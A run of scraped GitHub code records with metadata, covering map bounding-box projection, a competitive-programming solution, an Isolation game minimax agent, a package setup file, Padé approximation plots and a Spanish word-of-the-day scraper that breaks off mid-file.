yet.\r\n # \"\"\"\r\n # err = None\r\n\r\n # t_g_b = self.top < self.bottom\r\n # t_l_b = self.top > self.bottom\r\n # r_g_l = self.right > self.left\r\n # r_l_l = self.right < self.left\r\n\r\n # if self.top < self.bottom:\r\n # err = f\"Top=({self.top}) < bottom=({self.bottom})\"\r\n # raise self.BoundsError(err)\r\n # elif abs(self.right) > abs(self.left):\r\n # err = f\"Right=({abs(self.right)}) > left=({abs(self.left)})\"\r\n # raise self.BoundsError(err)\r\n # elif self.top == self.bottom or self.right == self.left:\r\n # err = f\"Lines not supported.\"\r\n # raise NotImplementedError(err)\r\n\r\n def lookup(self, k):\r\n \"\"\"\r\n Given k, return which of the 4 attrs it corresponds to.\r\n \"\"\"\r\n for a, v in self._aliases.items():\r\n if k in a or k == v:\r\n return v\r\n err = f\"{k} is not a supported alias.\"\r\n raise TypeError(err)\r\n\r\n\r\n# @frozen\r\n@define\r\nclass LatLonBBox(BBox):\r\n \"\"\"\r\n For EPSG:4326, origin at lat, lon (0, 0).\r\n North: +lat, South: -lat, West: -lon, East: +lon\r\n \"\"\"\r\n\r\n left: float = lon_field\r\n top: float = lat_field\r\n right: float = lon_field\r\n bottom: float = lat_field\r\n crs: str = field(default=\"EPSG:4326\", init=False)\r\n point_type: LatLon = field(default=LatLon, init=False, repr=False)\r\n\r\n def __init__(self, *args, **kwargs):\r\n \"\"\"\r\n Underlying store is left, top, right, bottom,\r\n but lat/lon ordering in top (north), left (west), bottom (south), right (east).\r\n kwargs should get proper position by virtue of the aliases, but args won't.\r\n \"\"\"\r\n la = len(args)\r\n if la == 1 and len(kwargs) == 0 and isinstance(args[0], mercantile.LngLatBbox):\r\n w, s, e, n = args[0]\r\n args = (n, w, s, e)\r\n elif la > 5:\r\n err = f\"{type(self).__name__}takes from 4 to 5 positional arguments but {la} were given\"\r\n raise TypeError(err)\r\n extra_kwargs = {f\"_ll{k}\": v for k, v in zip(\"nwsec\", args)}\r\n kwargs.update(extra_kwargs)\r\n super().__init__(**kwargs)\r\n\r\n @property\r\n def tl(self) -> Point:\r\n \"\"\"Top Left corner point\"\"\"\r\n return self.point_type(self.top, self.left)\r\n\r\n @property\r\n def br(self) -> Point:\r\n \"\"\"Bottom Right corner point\"\"\"\r\n return self.point_type(self.bottom, self.right)\r\n\r\n def __iter__(self) -> Iterable[Tuple[int, int, int, int]]:\r\n return iter((self.top, self.left, self.bottom, self.right))\r\n\r\n def __str__(self) -> str:\r\n dirs = [\"north\", \"west\", \"south\", \"east\"]\r\n vals = [self.top, self.left, self.bottom, self.right]\r\n dir_vals = \", \".join([f\"{n}={v}\" for n, v in zip(dirs, vals)])\r\n return f\"LatLonBBox({dir_vals}, crs={self.crs})\"\r\n\r\n @classmethod\r\n def from_string(cls, s: str) -> \"LatLonBBox\":\r\n res = [float(x) for x in s.split(\",\")]\r\n return LatLonBBox(*res)\r\n\r\n @classmethod\r\n def from_wgs84_order(cls, *args: Union[str, list, tuple]) -> \"LatLonBBox\":\r\n \"\"\"Generates a LatLonBBox from a string, tuple or list in WGS84 ordering.\"\"\"\r\n if len(args) == 1:\r\n if isinstance(args[0], str):\r\n args = args[0].split(\",\")\r\n else:\r\n args = args[0]\r\n if isinstance(args, (list, tuple)) and len(args) == 4:\r\n args = (args[3], args[0], args[1], args[2])\r\n args = [float(x) for x in args]\r\n ll_bbox = cls(*args)\r\n if tuple([*args]) != tuple(ll_bbox):\r\n in_bb = f\"({', '.join([str(x) for x in args])})\"\r\n logger.error(f\"{in_bb} != {tuple(ll_bbox)}\")\r\n msg = f\"input maybe not in WGS94 ordering (left, bottom, right, top)\"\r\n raise ValueError(msg)\r\n return ll_bbox\r\n\r\n @property\r\n def wgs84_order(self) -> tuple[float, float, float, float]:\r\n return self.left, self.bottom, self.right, self.top\r\n\r\n\r\n@frozen\r\nclass xyBBox(BBox):\r\n \"\"\"\r\n For EPSG:3857, origin at lat, lon (0, 0).\r\n North: +Y, South: -Y, West: -X, East: +X\r\n \"\"\"\r\n\r\n left: float = x_field\r\n top: float = y_field\r\n right: float = x_field\r\n bottom: float = y_field\r\n\r\n crs: str = field(default=\"EPSG:3857\", init=False)\r\n point_type: xyPoint = field(default=xyPoint, init=False, repr=False)\r\n\r\n def wms_str(self):\r\n return f\"{self.left},{self.bottom},{self.right},{self.top}\"\r\n\r\n\r\n@define\r\nclass Projector:\r\n \"\"\"\r\n Project from one CRS to another.\r\n Or, if created with None, can be used to \"swap\" the CRS of objects.\r\n Currently only supports EPSG:4326 and EPSG:3857.\r\n \"\"\"\r\n\r\n out_crs: str = field(validator=instance_of(Union[str, int, None]))\r\n size_of_earth: int = field(default=6378137, init=False) # WGS84\r\n earth_circ: float = field(default=20037508.342789244, init=False) # in meters\r\n latlon_extents: namedtuple = field(default=LatLonExtents, init=False)\r\n xy_extents: namedtuple = field(default=xyExtents, init=False)\r\n\r\n @out_crs.validator\r\n def _valid_crs(self, attrib, crs):\r\n if crs is None:\r\n return True\r\n val_crs = [\"4326\", \"3857\"]\r\n crs_val = [1 for x in val_crs if x in crs.lower()]\r\n if len(crs_val) != 1:\r\n crs_str = [\"EPSG:\" + x for x in val_crs]\r\n err = f\"{crs} not in supported. Supported: {', '.join(crs_str)}.\"\r\n raise ValueError(err)\r\n\r\n def project(self, obj: Union[BBox, Point]) -> Union[BBox, Point]:\r\n \"\"\"\r\n Takes an objects and projects it into the projector's current crs.\r\n For objects without a crs (BBoxBase, Point, Pixel, Basepoint), it will be converted to out_crs.\r\n Note that while much of this project uses EPSG:4326 which is lat/lon, EPSG:3857 (aka XY): is lon/lat.\r\n This is an important distinction to make!\r\n Args:\r\n obj (Union[BBox, Point]): Object to convert. Presently only works for objects that derive from BBoxBase and BasePoint.\r\n Raises:\r\n NotImplementedError: Obj type is not supported yet.\r\n Returns:\r\n Union[BBox, Point]: Projected version of the input object, with crs attached.\r\n \"\"\"\r\n try:\r\n if obj.crs == self.out_crs:\r\n return obj\r\n except AttributeError:\r\n pass\r\n if isinstance(obj, BBoxBase):\r\n return self.project_bbox(obj)\r\n elif isinstance(obj, BasePoint):\r\n return self.project_point(obj)\r\n else:\r\n raise NotImplementedError(f\"{type(obj).__name__} not supported yet.\")\r\n\r\n def project_bbox(self, bbox):\r\n \"\"\"\r\n Project the given bbox into our crs.\r\n \"\"\"\r\n ll_crs = \"4326\"\r\n xy_crs = \"3857\"\r\n # degrees form\r\n if xy_crs == self.out_crs or isinstance(bbox, LatLonBBox):\r\n nl, nt = self.project_point(bbox.tl)\r\n nr, nb = self.project_point(bbox.br)\r\n return xyBBox(left=nl, top=nt, right=nr, bottom=nb)\r\n # XY form\r\n if ll_crs == self.out_crs or isinstance(bbox, xyBBox):\r\n tl = self.project_point(bbox.tl)\r\n br = self.project_point(bbox.br)\r\n return LatLonBBox(n=tl.lat, w=tl.lon, s=br.lat, e=br.lon)\r\n\r\n def project_point(self, pnt):\r\n \"\"\"Protects the given point into our crs.\"\"\"\r\n # degrees form\r\n ll_crs = \"4326\"\r\n xy_crs = \"3857\"\r\n if xy_crs == self.out_crs or isinstance(pnt, LatLon):\r\n return self.latlon_to_xy(pnt)\r\n # XY form\r\n if ll_crs == self.out_crs or isinstance(pnt, xyPoint):\r\n return self.xy_to_latlon(pnt)\r\n\r\n def latlon_to_xy(self, pnt: Point) -> xyPoint:\r\n \"\"\"Converts 4326 to 3857\"\"\"\r\n lat, lon = pnt\r\n # Unclear if these checks are even needed, but they seem like a good idea anyways.\r\n lat_ext, lon_ext, rounv_v = self.latlon_extents\r\n assert abs(lat) <= lat_ext, f\"lat ({lat}) must be in [-{lat_ext}, {lat_ext}].\"\r\n assert abs(lon) <= lon_ext, f\"lon ({lon}) must be in [-{lon_ext}, {lon_ext}].\"\r\n\r\n mx = lon * self.earth_circ / 180.0\r\n y = math.degrees(math.log(math.tan((90 + lat) * math.pi / 360.0)))\r\n my = y * self.earth_circ / 180.0\r\n return xyPoint(round(mx, rounv_v), round(my, rounv_v))\r\n\r\n def xy_to_latlon(self, pnt: Point) -> LatLon:\r\n \"\"\"Converts 3857 to 4326\"\"\"\r\n mx, my = pnt\r\n # Unclear if these checks are even needed, but they seem like a good idea anyways.\r\n x_ext, y_ext, rounv_v = self.xy_extents\r\n assert abs(mx) <= x_ext, f\"x {mx} must be in [-{x_ext}, {x_ext}].\"\r\n assert abs(my) <= y_ext, f\"y {my} must be in [-{-y_ext}, {y_ext}].\"\r\n\r\n lon = mx / self.earth_circ * 180.0\r\n y = my / self.earth_circ * 180.0\r\n x = math.atan(math.exp(math.radians(y)))\r\n lat = 180 / math.pi * (2 * x - math.pi / 2.0)\r\n return LatLon(round(lat, rounv_v), round(lon, rounv_v))\r\n\r\n\r\ndef tid_to_xy_bbox(tid: Iterable) -> xyBBox:\r\n z, x, y = tid\r\n bounds = mercantile.bounds(x, y, z)\r\n ll_bbox = LatLonBBox(bounds)\r\n p = Projector(None)\r\n xy_bb = p.project(ll_bbox)\r\n return xy_bb\r\n","repo_name":"dfloer/mbtiles-test","sub_path":"static_maps/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":18462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8689346845","text":"# cook your dish here\nt=int(input())\nwhile t!=0:\n n=int(input())\n l=list(map(int,input().split()))\n lp=0\n r=0\n j=0\n while jr:\n r=c\n lp=l[j]\n elif c==r:\n r=c \n lp=0\n j+=1 \n if lp==0:\n print(\"CONFUSED\")\n else:\n print(lp)\n t-=1","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"LAPTOPREC.py","file_name":"LAPTOPREC.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"9890883622","text":"import isolation\nimport randomplayer\nimport math\nimport copy\nimport itertools\n\n\nclass Node:\n def __init__(self, board, move, token, is_max=True):\n \"\"\"\n\n :param board: a Board object\n :param move: a Move to be made by the opponent first to get to this node\n :param token: the Player token that is currently moving\n :param is_max: True if this row is a Max row\n \"\"\"\n self._board = copy.deepcopy(board)\n self._token = token\n self._move = move\n self._is_max = is_max\n if token is isolation.Board.RED_TOKEN:\n self._opponent = isolation.Board.BLUE_TOKEN\n else:\n self._opponent = isolation.Board.RED_TOKEN\n\n if move:\n self._board.make_move(self._opponent, move)\n\n\n token = self._token # if is_max else self._opponent\n neighbors = self._board.neighbor_tiles(self._board.token_location(token))\n current_location = self._board.token_location(token)\n push_out_squares = self._board.push_outable_square_ids()\n push_out_squares.add(current_location)\n self._available = [isolation.Move(idm, idt) for idm, idt\n in itertools.product(neighbors, push_out_squares) if idm != idt]\n\n\n # self._last_move = last_move\n self.allchildren = None\n\n def is_leaf(self):\n if self._is_max:\n self_location = self._board.token_location(self._token)\n self_neighbor_tiles = self._board.neighbor_tiles(self_location)\n return len(self_neighbor_tiles) == 0\n else:\n opponent_location = self._board.token_location(self._opponent)\n opponent_neighbor_tiles = self._board.neighbor_tiles(opponent_location)\n return len(opponent_neighbor_tiles) == 0\n\n def is_loser(self):\n if self.is_leaf():\n return self._is_max\n\n def is_winner(self):\n if self.is_leaf():\n return not self._is_max\n\n def is_max(self):\n return self._is_max\n\n def move(self):\n return self._move\n\n def children(self):\n if self.allchildren is None:\n # neighbors = self._board.neighbor_tiles(self._board.token_location(self._token))\n # current_location = self._board.token_location(self._token)\n # push_out_squares = self._board.push_outable_square_ids()\n # push_out_squares.add(current_location)\n # self._available = [isolation.Move(idm, idt) for idm, idt\n # in itertools.product(neighbors, push_out_squares) if idm != idt]\n\n self.allchildren = [\n Node(self._board,\n selected_move,\n self._opponent,\n is_max=not self._is_max)\n for selected_move in self._available]\n\n return self.allchildren\n\n def evaluate(self):\n distance_to_middle, closest_middle_space = self._get_distance_to_middle(self._board)\n opponent_moves = self._board.neighbor_tiles(self._board.token_location(self._opponent))\n our_moves = self._board.neighbor_tiles(self._board.token_location(self._token))\n\n num_opponent_moves = len(opponent_moves)\n num_our_moves = len(our_moves)\n\n h_value = (num_our_moves - num_opponent_moves)# - distance_to_middle\n return h_value\n\n def _get_distance_to_middle(self, board):\n middle_spaces = [19, 20, 27, 28]\n\n current_location = board.token_location(self._token)\n\n min_distance = board.distance_between(current_location, middle_spaces[0])\n closest_middle_space = middle_spaces[0]\n\n for mid in middle_spaces:\n distance_to_middle = board.distance_between(current_location, mid)\n if distance_to_middle < min_distance:\n closest_middle_space = mid\n min_distance = distance_to_middle\n return min_distance, closest_middle_space\n\n\n def __str__(self):\n return f'Node {self._is_max},\\n{self._board.square_id_map()}\\n\\n{self._board}\\n{self._token}, {self._opponent}\\n' +\\\n f'{self._move}\\navailable:\\n' + '\\n'.join(str(move) for move in self._available)\n\n\nclass PlayerAgent(isolation.Player):\n\n def __init__(self, name, token):\n \"\"\"\n Initialize this player\n :param name: This player's name\n :param token: This player's token\n \"\"\"\n super().__init__(name, token)\n if token is isolation.Board.RED_TOKEN:\n self._opponent = isolation.Board.BLUE_TOKEN\n else:\n self._opponent = isolation.Board.RED_TOKEN\n\n def take_turn(self, board):\n \"\"\"\n Make a move on the isolation board\n :param board: an Board object\n :return: Return a Move object\n \"\"\"\n\n print(\"\\n{} taking turn: \\n\".format(self._name), end='')\n\n tiles_remaining = len(board.push_outable_square_ids())\n\n if tiles_remaining >= 15:\n return self.early_game_strategy(board)\n else:\n n = Node(board, None, self._token)\n\n score, best_node = self.minimax_alpha_beta(n, -math.inf, math.inf)\n\n # When minimax returns n, if n was the initial node passed in, then the NoneType error occurs\n # because there is no move to get to that node.\n #\n # It will return n when n is a leaf node or the depth has been reached.\n # The only time it will be None is if it is a leaf node.\n if best_node is None:\n return self.early_game_strategy(board)\n else:\n move = best_node.move()\n print(f'{self._name} {move}')\n return move\n\n def choose_move(self, board):\n self_location = board.token_location(self._token)\n opponent_location = board.token_location(self._opponent)\n\n distance_to_middle, closest_middle = self.get_distance_to_middle(board)\n dir_x, dir_y = board.direction(self_location, closest_middle)\n\n def _h(self, board):\n distance_to_middle, closest_mid = self.get_distance_to_middle(board)\n\n opponent_moves = board.neighbor_tiles(board.token_location(self._opponent))\n our_moves = board.neighbor_tiles(board.token_location(self._token))\n\n num_opponent_moves = len(opponent_moves)\n num_our_moves = len(our_moves)\n\n h_value = distance_to_middle + (num_opponent_moves - num_our_moves)\n return h_value\n\n def get_distance_to_middle(self, board):\n middle_spaces = [19, 20, 27, 28]\n\n current_location = board.token_location(self._token)\n\n min_distance = board.distance_between(current_location, middle_spaces[0])\n closest_middle_space = middle_spaces[0]\n\n for mid in middle_spaces:\n distance_to_middle = board.distance_between(current_location, mid)\n if distance_to_middle < min_distance:\n closest_middle_space = mid\n min_distance = distance_to_middle\n return min_distance, closest_middle_space\n\n def early_game_strategy(self, board):\n # move towards the middle of the board\n # pop the tile 2 away from\n\n move_to_make = self.move_towards_middle_early_strat(board)\n punch_out_tile = self.punch_out_early_strat(board, move_to_make)\n return isolation.Move(move_to_make, punch_out_tile)\n\n def move_towards_middle_early_strat(self, board):\n min_distance_to_middle, closest_middle_space = self.get_distance_to_middle(board)\n our_moves = list(board.neighbor_tiles(board.token_location(self._token)))\n opponent_moves = list(board.neighbor_tiles(board.token_location(self._opponent)))\n # x = our_moves[0]\n # possible_moves = isolation.Board.neighbor_tiles(x)\n best_moves = our_moves[0]\n best_move = len(board.neighbor_tiles(our_moves[0])) - len(opponent_moves)\n # best_move = 0\n\n for move in our_moves:\n distance_to_the_middle = board.distance_between(move, closest_middle_space)\n possible_move = len(board.neighbor_tiles(move)) - len(opponent_moves) - (.5 * distance_to_the_middle)\n\n if possible_move >= best_move:\n if move not in board.pushed_out_square_ids():\n # if len(list_of_prev_moves) > 0 and move != list_of_prev_moves[-1]:\n best_move = possible_move\n best_moves = move\n\n return best_moves\n\n def punch_out_early_strat(self, board, move_to_tile):\n min_distance_to_middle, closest_middle_space = self.get_distance_to_middle(board)\n opponent_moves = list(board.neighbor_tiles(board.token_location(self._opponent)))\n our_moves = list(board.neighbor_tiles(board.token_location(self._token)))\n best_move = len(board.neighbor_tiles(opponent_moves[0])) - len(our_moves) + min_distance_to_middle\n punch_out = opponent_moves[0]\n\n for move in opponent_moves:\n possible_move = len(board.neighbor_tiles(move)) - len(our_moves) + min_distance_to_middle\n if possible_move >= best_move:\n if move != move_to_tile and not board.is_pushed_out(move):\n best_move = possible_move\n punch_out = move\n\n return punch_out\n\n def minimax_alpha_beta(self, n, a, b, depth=0):\n \"\"\"\n Return a pair (best_score, best_node) where best_score is\n min or max and best_node is the node associated with that score\n :param n:\n :param a:\n :param b:\n :param depth:\n :return:\n \"\"\"\n\n # print(' * ' * depth, f'a={a}, b={b}\\n', n)\n best_node = n\n\n if n.is_leaf() or depth > 2:\n if n.move() is None:\n pass\n return n.evaluate(), n\n elif n.is_max():\n for child_node in n.children():\n score, path = self.minimax_alpha_beta(child_node, a, b, depth + 1)\n if score >= b:\n return score, None # Quit searching\n if score > a:\n a = score\n best_node = child_node\n\n if best_node.move() is None:\n pass\n return a, best_node\n else:\n for child_node in n.children():\n score, path = self.minimax_alpha_beta(child_node, a, b, depth + 1)\n if score <= a:\n return score, None\n if score < b:\n b = score\n best_node = child_node\n\n if best_node.move() is None:\n pass\n return b, best_node\n\n def board_is_end_state(self, board):\n self_location = board.token_location(self._token)\n opponent_location = board.token_location(self._opponent)\n\n self_neighbor_tiles = board.neighbor_tiles(self_location)\n opponent_neighbor_tiles = board.neighbor_tiles(opponent_location)\n\n return len(self_neighbor_tiles) == 0 or len(opponent_neighbor_tiles) == 0\n\n def is_max_node(self):\n return self._token is isolation.Board.BLUE_TOKEN\n\n\nif __name__ == '__main__':\n # # Create a match\n isolation.Board.set_dimensions(6, 8)\n board = isolation.Board()\n # board.set_state(16, 20, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9,14, 15, 24, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45,46, 47])\n # board.set_state(13, 9, [0, 4, 5, 6, 8, 12, 18, 19, 21, 23, 24, 25, 26, 28, 30, 32, 33, 34, 35, 36, 41, 42, 43, 44])\n match = isolation.Match(PlayerAgent('Blue', isolation.Board.BLUE_TOKEN),\n randomplayer.RandomPlayer('Red', isolation.Board.RED_TOKEN),\n board)\n match.start_play()\n\n # # Play 100 more matches\n # for i in range(100):\n # match = isolation.Match(PlayerAgent('Blue', isolation.Board.BLUE_TOKEN),\n # randomplayer.RandomPlayer('Red', isolation.Board.RED_TOKEN),\n # isolation.Board())\n # print(match.start_play())\n # print('*' * 40)\n","repo_name":"sykesab/isolation-fuschia","sub_path":"Code/fuchsia.py","file_name":"fuchsia.py","file_ext":"py","file_size_in_byte":12076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29238520383","text":"from setuptools import setup\nfrom fluxory.__version__ import version\ndesc = 'Asynchronous high-performance distributed OpenFlow 1.3/1.5 framework'\n\nsetup(\n name='fluxory',\n version=version,\n description=desc,\n author='Vinicius Arcanjo',\n author_email='viniarck@gmail.com',\n keywords='OpenFlow SDN async asyncio distributed',\n url='http://github.com/viniarck/fluxory',\n python_requires='>3.7',\n packages=['fluxory'],\n license='Apache',\n install_requires=['nose>=1.3.7', 'pytest>=4.3.0', 'aio-pika>=5.2.3', 'netaddr>=0.7.19'],\n classifiers=[\n 'Programming Language :: Python :: 3.7',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: MacOS',\n ],\n zip_safe=False,\n)\n","repo_name":"viniarck/fluxory","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25219883587","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport copy\r\nimport random\r\nimport math\r\nimport time\r\nfrom numpy.linalg import inv\r\nimport sympy as sym\r\nimport scipy.misc\r\nfrom math import sin\r\nfrom sympy import *\r\n\r\ndef fun1(x):\r\n return math.exp(-x**2)\r\ndef fun2(x):\r\n return math.cos(x)\r\ndef fun3(x):\r\n return math.sin(x)\r\ndef derivative1(fun,x,d=1e-6,n=1):\r\n return scipy.misc.derivative(fun,x,dx=d,n=n)\r\ndef derivative2(gfg_exp,x0,n=1):\r\n x, y = symbols('x y')\r\n dif=gfg_exp\r\n for i in range(n):\r\n dif = str(diff(dif, x))\r\n x=x0\r\n return eval(dif)\r\ndef calculate_c(fun,k):\r\n k=abs(k)\r\n if fun==\"exp(-x**2)\":\r\n if k % 2 == 0:\r\n return (-1) ** (int(k/2)) / math.factorial(int(k/2))\r\n else:\r\n return 0\r\n elif fun==\"cos(x)\":\r\n if k % 2 == 0:\r\n return (-1) ** (int(k/2)) / math.factorial(k)\r\n else:\r\n return 0\r\n elif fun==\"sin(x)\":\r\n if k % 2 == 1:\r\n return (-1) ** (int((k-1)/2)) / math.factorial(k)\r\n else:\r\n return 0\r\n\r\ndef factor_Pade(fun,N,M):\r\n A=np.zeros((M,M))\r\n y=np.zeros((M,1))\r\n b=np.zeros((M+1,1))\r\n a=np.zeros((N+1,1))\r\n for i in range(M):\r\n k=N+i+1\r\n y[i]=-calculate_c(fun,k)\r\n for i in range(M):\r\n for j in range(M):\r\n k=N-M+1+j+i\r\n A[i,j] = calculate_c(fun,k)\r\n x=np.linalg.inv(A)@y\r\n b[0]=1\r\n for i in range(M):\r\n b[i+1]=x[M-1-i]\r\n for i in range(N+1):\r\n for j in range(i+1):\r\n k=i-j\r\n c = calculate_c(fun,k)\r\n a[i]+=b[j]*c\r\n return a,b\r\ndef approximation_Pade(fun,N,M,x):\r\n a,b=factor_Pade(fun,N,M)\r\n y=[]\r\n for j in x:\r\n P = 0\r\n Q = 0\r\n for i in range(N+1):\r\n P+=a[i]*j**i\r\n for i in range(M+1):\r\n Q+=b[i]*j**i\r\n y.append(P/Q)\r\n return y\r\n# a,b=-5,5\r\n# tab=[(2, 2), (4, 4), (6, 6), (2, 4), (2, 6), (2, 8),(14,14)]\r\n# tab1=[\"\\u2082,\\u2082\",\"\\u2084,\\u2084\",\"\\u2086,\\u2086\",\"\\u2082,\\u2084\",\"\\u2082,\\u2086\",\"\\u2082,\\u2088\",\"\\u2081\\u2084,\\u2081\\u2084\"]\r\n# for k in range(len(tab)):\r\n# N,M=tab[k]\r\n# x = list(np.linspace(a, b, num=2000))\r\n# y = [fun1(i) for i in x]\r\n# y1=approximation_Pade(\"exp(-x**2)\",N,M,x)\r\n# plt.plot(x,y,color='black',linewidth=3,label=r'Teoria f(x)=$e^{-x^2}$')\r\n# plt.plot(x,y1,color='orange',label=f\"Aproksymacja R{tab1[k]}\")\r\n# plt.xlabel('x')\r\n# plt.ylabel('f(x)')\r\n# plt.title(\"Wykres dla N={} i M={}\".format(N,M))\r\n# plt.legend(framealpha=1, frameon=True)\r\n# plt.show()\r\n# a,b=-5,5\r\n# tab=[(2, 2), (4, 4), (6, 6)]\r\n# tab1=[\"\\u2082,\\u2082\",\"\\u2084,\\u2084\",\"\\u2086,\\u2086\"]\r\n# for k in range(len(tab)):\r\n# N,M=tab[k]\r\n# x = list(np.linspace(a, b, num=100))\r\n# y = [fun2(i) for i in x]\r\n# y1=approximation_Pade(\"cos(x)\",N,M,x)\r\n# plt.plot(x,y,color='black',linewidth=3,label=\"Teoria f(x)=cos(x)\")\r\n# plt.plot(x,y1,color='orange',label=f\"Aproksymacja R{tab1[k]}\")\r\n# plt.xlabel('x')\r\n# plt.ylabel('f(x)')\r\n# plt.title(\"Wykres dla N={} i M={}\".format(N,M))\r\n# plt.legend(framealpha=1, frameon=True)\r\n# plt.show()\r\n# a,b=-2*math.pi,2*math.pi\r\n# tab=[(3, 3), (5, 5), (7, 7)]\r\n# tab1=[\"\\u2083,\\u2083\",\"\\u2085,\\u2085\",\"\\u2087,\\u2087\"]\r\n# for k in range(len(tab)):\r\n# N,M=tab[k]\r\n# x = list(np.linspace(a, b, num=100))\r\n# y = [fun3(i) for i in x]\r\n# y1=approximation_Pade(\"sin(x)\",N,M,x)\r\n# plt.plot(x,y,color='black',linewidth=3,label=\"Teoria f(x)=sin(x)\")\r\n# plt.plot(x,y1,color='orange',label=f\"Aproksymacja R{tab1[k]}\")\r\n# plt.xlabel('x')\r\n# plt.ylabel('f(x)')\r\n# plt.title(\"Wykres dla N={} i M={}\".format(N,M))\r\n# plt.legend(framealpha=1, frameon=True)\r\n# plt.show()\r\n\r\nx=np.arange(-2*math.pi,2*math.pi,0.1)\r\ny=np.sin(x)\r\nfig,ax=plt.subplots()\r\nax.plot(x,y)\r\nunit = 0.5\r\nplt.xlabel('x')\r\nplt.ylabel('f(x)')\r\nx_tick = np.arange(-2, 2+unit, unit)\r\nx_label = [r\"$\" + format(r, \".2g\")+ r\"\\pi$\" for r in x_tick]\r\nax.set_xticks(x_tick*np.pi)\r\nax.set_xticklabels(x_label, fontsize=9)\r\nplt.plot(x,[0]*len(x),color='black')\r\nplt.plot([0,0,0],[0,1.2,-1.2],color='black')\r\nplt.show()\r\n\r\nx=np.arange(-5,5,0.1)\r\ny=np.cos(x)\r\nfig,ax=plt.subplots()\r\nax.plot(x,y)\r\nunit = 0.5\r\nplt.xlabel('x')\r\nplt.ylabel('f(x)')\r\nx_tick = np.arange(-2, 2+unit, unit)\r\nx_label = [r\"$\" + format(r, \".2g\")+ r\"\\pi$\" for r in x_tick]\r\nax.set_xticks(x_tick*np.pi)\r\nax.set_xticklabels(x_label, fontsize=9)\r\nplt.plot(x,[0]*len(x),color='black')\r\nplt.plot([0,0,0],[0,1.2,-1.2],color='black')\r\nplt.show()\r\n\r\nx = list(np.linspace(-5, 5, num=100))\r\ny = [math.exp(-i**2) for i in x]\r\nplt.plot(x,y)\r\nplt.xlabel('x')\r\nplt.ylabel('f(x)')\r\nplt.plot(x,[0]*len(x),color='black')\r\nplt.plot([0,0,0],[0,1.2,-1.2],color='black')\r\nplt.show()","repo_name":"MrLipa/WFiIS-MN-2020-21","sub_path":"Lab9/Lab9.py","file_name":"Lab9.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29793959734","text":"import bs4\nimport requests\nimport time\nfrom random import randint\nfrom random import choice\nfrom random import sample\nimport sqlite3 as sq\nimport pandas as pd\nletters = [\"a\",\"b\",\"c\",\"d\"]\nresult = requests.get('https://www.spanishdict.com/wordoftheday/1')\nsoup = bs4.BeautifulSoup(result.text,'lxml')\n\n\nclass Spanish:\n \n def __init__(self,today,yesterday,week,month,year,span_comp,get_words,Quiz):\n \n self.today = today\n self.yesterday = yesterday\n self.week = week\n self.month = month\n self.year = year\n self.span_comp = span_comp\n self.get_words = get_words\n self.Quiz = Quiz\n \n def today(self):\n \n today = soup.select('h3')[0]\n totext = today.text\n today1 = soup.select('div._3iXmZ8Jd')[0]\n totext1 = today1.text\n spex = soup.select(\"div._2I4LpW3B\")[0]\n spextext = spex.text\n enex = soup.select('div._2w_JRz6o')[0]\n enextext = enex.text\n\n print(\"Today's word is:\\n\")\n print(f\"{totext}\")\n print(f\"{totext1}\\n\")\n print(\"Example:\\n\")\n print(f\"{spextext}\")\n print(f\"{enextext}\")\n \n def yesterday(self):\n \n today = soup.select('h3')[1]\n totext = today.text\n today1 = soup.select('div._3iXmZ8Jd')[1]\n totext1 = today1.text\n spex = soup.select(\"div._2I4LpW3B\")[2]\n spextext = spex.text\n enex = soup.select('div._2w_JRz6o')[2]\n enextext = enex.text\n\n print(\"Yesterday's word was:\\n\")\n print(f\"{totext}\")\n print(f\"{totext1}\\n\")\n print(\"Example:\\n\")\n print(f\"{spextext}\")\n print(f\"{enextext}\")\n \n def week(self):\n \n count = 0\n\n for i in range(0,7):\n\n result = requests.get('https://www.spanishdict.com/wordoftheday/1')\n soup = bs4.BeautifulSoup(result.text,'lxml')\n spword = soup.select('h3')[i]\n enword = soup.select('div._3iXmZ8Jd')[i]\n count += 1\n\n\n print(f\"{count}){spword.text}\")\n print(f\"{enword.text}\\n\")\n\n def month(self):\n\n count = 0\n\n for n in range(1,5):\n\n\n baseurl = ('https://www.spanishdict.com/wordoftheday/{}')\n scrapeurl = baseurl.format(n)\n\n result = requests.get(scrapeurl)\n soup = bs4.BeautifulSoup(result.text,'lxml')\n\n for i in range(0,10):\n\n spword = soup.select('h3')[i]\n enword = soup.select('div._3iXmZ8Jd')[i]\n count += 1\n if count == 32:\n break\n\n\n\n print(f\"{count}){spword.text}\")\n print(f\"{enword.text}\\n\")\n \n \n def year(self):\n \n count = 0\n\n for n in range(1,38):\n\n\n baseurl = ('https://www.spanishdict.com/wordoftheday/{}')\n scrapeurl = baseurl.format(n)\n\n result = requests.get(scrapeurl)\n soup = bs4.BeautifulSoup(result.text,'lxml')\n\n for i in range(0,10):\n\n spword = soup.select('h3')[i]\n enword = soup.select('div._3iXmZ8Jd')[i]\n count += 1\n\n if count == 366:\n break\n\n\n print(f\"{count}){spword.text}\")\n print(f\"{enword.text}\\n\")\n \n \n\n def get_words(self):\n\n engwords = []\n spnwords = []\n\n\n for n in range(1,10):\n\n\n baseurl = ('https://www.spanishdict.com/wordoftheday/{}')\n scrapeurl = baseurl.format(n)\n\n result = requests.get(scrapeurl)\n soup = bs4.BeautifulSoup(result.text,'lxml')\n\n for i in range(0,10):\n\n spword = soup.select('h3')[i]\n spnwords.append(spword.text)\n\n enword = soup.select('div._3iXmZ8Jd')[i]\n engwords.append(enword.text)\n\n\n spanengdict = {engwords[i]: spnwords[i] for i in range(len(engwords))}\n return spanengdict\n \n \n def Quiz(self):\n \n play = True\n ques = 1\n points = 0\n name = 